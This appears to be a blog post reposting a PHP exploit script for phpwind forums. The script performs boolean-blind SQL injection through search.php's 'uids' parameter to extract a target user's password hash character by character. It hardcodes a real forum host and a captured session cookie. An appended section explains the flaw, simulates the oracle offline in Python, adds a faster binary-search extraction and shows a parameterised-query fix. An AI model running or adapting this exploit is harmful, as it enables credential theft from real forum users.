phpwind 0day code found on the web


Posted in PHP on December 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: 12px;
line-height: 150%;
}
.smlfont {
font-family: "Tahoma";
font-size: 11px;
}
.INPUT {
FONT-SIZE: 12px;
COLOR: #000000;
BACKGROUND-COLOR: #FFFFFF;
height: 18px;
border: 1px solid #666666;
padding-left: 2px;
}
.redfont {
COLOR: #A60000;
}
a:link,a:visited,a:active {
color: #000000;
text-decoration: underline;
}
a:hover {
color: #465584;
text-decoration: none;
}
.top {BACKGROUND-COLOR: #CCCCCC}
.firstalt {BACKGROUND-COLOR: #EFEFEF}
.secondalt {BACKGROUND-COLOR: #F5F5F5}
</style>
</head>
<body>
<center>The Exploit Of All Phpwind Versions</center>
<center>BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
// Boolean-based blind SQL injection against phpwind's search.php: the `uids`
// parameter is spliced into the search query, and the response either lists
// a matching thread or shows $mask. That yes/no signal is all the script needs.
ini_set("max_execution_time", 0);
error_reporting(7);            // E_ERROR | E_WARNING | E_PARSE

$path = "/search.php";
$server = 'bbs.ccidnet.com';
// Cookie and User-Agent of a logged-in session; search.php requires a login.
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid = 2;                      // target user whose password hash is read
if (!empty($_GET['uid'])) $uid = $_GET['uid'];
$tid = 539264;                 // an existing thread id: when the injected condition is true,
                               // the UNION returns this tid and the search shows a hit

$mask = '没有查找匹配的内容';   // "no matching content found": shown when the condition is false
$count = 0;                    // number of requests sent

//$testing=1;
//$testing=$_GET['test'];
// Optional check: print the PHP version from the X-Powered-By header and stop.
if (!empty($testing)) {preg_match('/X-Powered-By: php\/(.+)\r\n/i', send(""), $php); echo $php[1]; die();}

//$debug=1;

// First probe: $sql is empty here, so `uids=-1/*j` comments out the rest of
// the query. The broken query fails and the response echoes the SQL text, so
// the "FROM <prefix>threads" fragment reveals the table prefix.
$sql = '';
$temp = md5(rand(1,100) + microtime());
$cmd = "step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response = send($cmd);

preg_match('/FROM (.+)threads/i', $response, $match);

$pre = $match[1];
if ($match[1]) echo 'Good job! Got the table prefix: <font color=red>'.$match[1]."</font><br>";
// '登 录' is the label of the login button, so its presence means the session is not logged in
else if (strpos($response, 'value="登 录"')) die("You are not logged in! Try another Cookie and User-Agent value!<br>");
else {echo "Maybe it is not vulnerable!<br>"; die();}

echo "Trying to get the password hash of uid=$uid:<font color=red>";
$log = fopen('log.txt', 'a+');

// Read 16 characters of the stored hash, positions 9..24 (MySQL mid() is
// 1-indexed), one character at a time. Each character is first classified
// with a range test (digit, then lowercase letter), then found by trying every
// value of that range with an equality test. A true condition makes the UNION
// return $tid, so $mask disappears from the response.
for ($i = 0; $i < 16; $i++)
{

$sub = $i + 9;
$sql = " union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql = urlencode($sql);
$temp = md5(rand(1,100) + microtime());
$cmd = "step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if (!strpos(send($cmd), $mask)) {

// it is a digit: try '0'..'9'
for ($m = 48; $m <= 57; $m++) {
$sql = " union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql = urlencode($sql);
$temp = md5(rand(1,100) + microtime());
$cmd = "step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if (!strpos(send($cmd), $mask)) {

echo chr($m);
fputs($log, chr($m));
break;
}
}
continue;
}

$sql = " union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql = urlencode($sql);
$temp = md5(rand(1,10000) + microtime());
$cmd = "step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if (!strpos(send($cmd), $mask)) {

// it is a lowercase letter: try 'a'..'z'
for ($m = 97; $m <= 122; $m++) {
$sql = " union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql = urlencode($sql);
$temp = md5(rand(1,100) + microtime());
$cmd = "step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if (!strpos(send($cmd), $mask)) {
echo chr($m);
fputs($log, chr($m));
break;
}
}
continue;
}

// neither range matched: the hash character is not a digit or a lowercase letter
echo "error!<br>";
die("Maybe the data you posted is not valid! Try another UID\r\n");

}
fclose($log);
echo "<br>Done! Sent $count requests.<br>";

// Send one POST to search.php over a raw socket and return the whole response.
function send($cmd)
{
global $path, $server, $cookie, $count, $useragent, $debug;

$count = $count + 1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
// Ask the server to close the connection after the response, so the read
// loop below ends at the end of the body instead of waiting for the
// server's keep-alive timeout on every request.
$message .= "Connection: Close\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen($server, 80);
if (!$fd) die("Could not connect to $server:80\r\n");
fputs($fd, $message);
$resp = "<pre>";
while (!feof($fd)) {
$resp .= fread($fd, 1024);
}
fclose($fd);
$resp .= "</pre>";
if (!empty($debug)) {echo $cmd; echo $resp;}
return $resp;
}
?>
</body>
</html>
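What the script above exploits is a boolean-based blind SQL injection: the value `-1) union select $tid from <prefix>members where uid=$uid and ord(mid(password,N,1))... /*` is spliced into search.php's query through the `uids` parameter, and whether the response still carries the "no matching content found" text (`$mask`) tells the attacker whether a condition on one character of the stored hash held. The script reads 16 characters, positions 9 to 24, with a range test followed by one equality request per candidate value. The Python below is an added example and not the exploit's or phpwind's code: it simulates that oracle offline with an in-memory SQLite database (SQLite's `unicode(substr())` standing in for MySQL's `ord(mid())`), reproduces the script's range-then-enumerate strategy, contrasts it with a binary search over the hex alphabet that needs exactly four requests per character, and shows the parameterised query that closes the hole. The shape of the injectable query (`... WHERE authorid IN(<uids>) AND ...`), the table prefix `pw_`, the sample password and the thread id are all constructed assumptions.

```python
"""Added example: offline simulation of the search.php boolean-blind oracle.
Not the exploit's or phpwind's code; the query shape below is an assumption."""
import hashlib
import sqlite3

PREFIX = "pw_"                 # table prefix (the script reads it from an error page)
TARGET_UID = 2                 # the script's $uid
TID = 539264                   # the script's $tid: an existing thread id
NO_MATCH = "没有查找匹配的内容"     # the script's $mask: "no matching content found"
HEX = "0123456789abcdef"


def build_db():
    """Constructed sample data: one member row and one thread by another user."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE {PREFIX}members(uid INTEGER, password TEXT)")
    con.execute(f"CREATE TABLE {PREFIX}threads(tid INTEGER, authorid INTEGER)")
    pw_hash = hashlib.md5(b"constructed-sample-password").hexdigest()
    con.execute(f"INSERT INTO {PREFIX}members VALUES (?, ?)", (TARGET_UID, pw_hash))
    con.execute(f"INSERT INTO {PREFIX}threads VALUES (?, ?)", (TID, 1))
    return con, pw_hash


def render(rows):
    """The page either lists the matching thread ids or shows the no-match text."""
    return " ".join(str(r[0]) for r in rows) if rows else NO_MATCH


def vulnerable_search(con, uids):
    """Assumed shape of the injectable query: `uids` is spliced in unescaped, so
    `-1) union select ... /*` closes the IN(...) and comments out the rest."""
    sql = f"SELECT tid FROM {PREFIX}threads WHERE authorid IN({uids}) AND tid > 0"
    return render(con.execute(sql).fetchall())


def hardened_search(con, uids):
    """The fix: accept only integers and bind them, so input never becomes SQL."""
    parts = [p.strip() for p in uids.split(",")]
    if not all(p.lstrip("-").isdigit() for p in parts):
        return NO_MATCH
    marks = ",".join("?" * len(parts))
    sql = f"SELECT tid FROM {PREFIX}threads WHERE authorid IN({marks}) AND tid > 0"
    return render(con.execute(sql, [int(p) for p in parts]).fetchall())


class Oracle:
    """One request per call: True when the injected condition made the UNION
    return TID, i.e. when the no-match text is absent, exactly as the script tests."""

    def __init__(self, con):
        self.con, self.requests = con, 0

    def __call__(self, condition):
        self.requests += 1
        payload = (f"-1) union select {TID} from {PREFIX}members "
                   f"where uid={TARGET_UID} and {condition}/*.")
        return NO_MATCH not in vulnerable_search(self.con, payload)


def probe(pos):
    # SQLite's unicode(substr()) plays the role of MySQL's ord(mid()); 1-indexed.
    return f"unicode(substr(password,{pos},1))"


def extract_linear(oracle, start=9, length=16):
    """The script's strategy: digit range test, then lowercase range test, then
    one equality request per candidate value of the matching range."""
    out = ""
    for pos in range(start, start + length):
        c = probe(pos)
        for lo, hi in ((48, 57), (97, 122)):
            if oracle(f"{c}>{lo - 1} and {c}<{hi + 1}"):
                for v in range(lo, hi + 1):
                    if oracle(f"{c}={v}"):
                        out += chr(v)
                        break
                break
        else:
            raise RuntimeError(f"position {pos}: neither range matched")
    return out


def extract_bisect(oracle, start=9, length=16, alphabet=HEX):
    """Same oracle, binary search over the sorted alphabet: four requests per
    character for the 16 hex symbols, whatever the value."""
    ords = sorted(ord(ch) for ch in alphabet)
    out = ""
    for pos in range(start, start + length):
        c, lo, hi = probe(pos), 0, len(ords) - 1   # inclusive candidate index range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{c}>{ords[mid]}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(ords[lo])
    return out


def run():
    """Returns (linear result, bisect result, true fragment, linear reqs, bisect reqs)."""
    con, pw_hash = build_db()
    linear, bisect = Oracle(con), Oracle(con)
    a, b = extract_linear(linear), extract_bisect(bisect)
    return a, b, pw_hash[8:24], linear.requests, bisect.requests   # mid(password,9,16)


if __name__ == "__main__":
    a, b, e, n1, n2 = run()
    print(f"target  {e}\nlinear  {a}  ({n1} requests)\nbisect  {b}  ({n2} requests)")
```

Run it directly to see both recovered fragments next to the true one and the request counts: `extract_bisect` always needs 64 requests for the 16 characters, while the script's own strategy costs between 2 and 11 requests per character depending on its value. `hardened_search` returns the no-match page for the same payload because the `uids` list is validated as integers and bound as parameters rather than concatenated.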
